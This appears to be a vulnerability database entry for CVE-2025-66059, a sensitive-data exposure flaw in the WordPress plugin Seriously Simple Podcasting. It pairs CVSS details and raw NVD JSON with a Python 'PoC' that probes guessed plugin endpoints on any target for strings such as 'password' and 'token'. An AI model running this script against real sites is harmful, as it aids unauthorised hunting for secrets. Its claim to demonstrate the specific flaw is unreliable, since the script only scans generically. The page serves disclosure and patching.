Security Vulnerability Report
中文
CVE-2025-66059 CVSS 5.3 MEDIUM

CVE-2025-66059

Published: 2025-11-21 13:15:47
Last Modified: 2026-04-27 18:16:32

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Craig Hewitt Seriously Simple Podcasting seriously-simple-podcasting allows Retrieve Embedded Sensitive Data.This issue affects Seriously Simple Podcasting: from n/a through <= 3.13.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:castos:seriously_simple_podcasting:*:*:*:*:*:wordpress:*:* - VULNERABLE
Seriously Simple Podcasting <= 3.13.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66059 PoC - Seriously Simple Podcasting Information Disclosure # This PoC demonstrates the information disclosure vulnerability # Use for authorized security testing only import requests import sys def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-66059 """ # Common endpoints that may expose sensitive data endpoints = [ '/wp-json/ssp/v1/feed', '/wp-json/ssp/v1/podcast', '/?feed=podcast', '/wp-content/plugins/seriously-simple-podcasting/assets/' ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-66059 - Information Disclosure\n") for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, timeout=10, verify=False) print(f"[+] Endpoint: {endpoint}") print(f" Status: {response.status_code}") if response.status_code == 200: content_length = len(response.content) print(f" Content Length: {content_length} bytes") # Check for sensitive data patterns sensitive_patterns = ['api_key', 'password', 'secret', 'token', 'db_'] for pattern in sensitive_patterns: if pattern in response.text.lower(): print(f" [!] Potential sensitive data found: {pattern}") print() except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {str(e)}\n") print("[*] Scan complete. If sensitive data was detected, the system may be vulnerable.") print("[*] Please verify manually and apply patches if necessary.") if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: python cve-2025-66059-poc.py <target_url>") print("Example: python cve-2025-66059-poc.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66059", "sourceIdentifier": "[email protected]", "published": "2025-11-21T13:15:46.623", "lastModified": "2026-04-27T18:16:31.647", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Craig Hewitt Seriously Simple Podcasting seriously-simple-podcasting allows Retrieve Embedded Sensitive Data.This issue affects Seriously Simple Podcasting: from n/a through <= 3.13.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:castos:seriously_simple_podcasting:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "3.14.0", "matchCriteriaId": "201F9458-7BDE-4E42-85DD-AB15D5B6A90E"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/seriously-simple-podcasting/vulnerability/wordpress-seriously-simple-podcasting-plugin-3-13-0-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}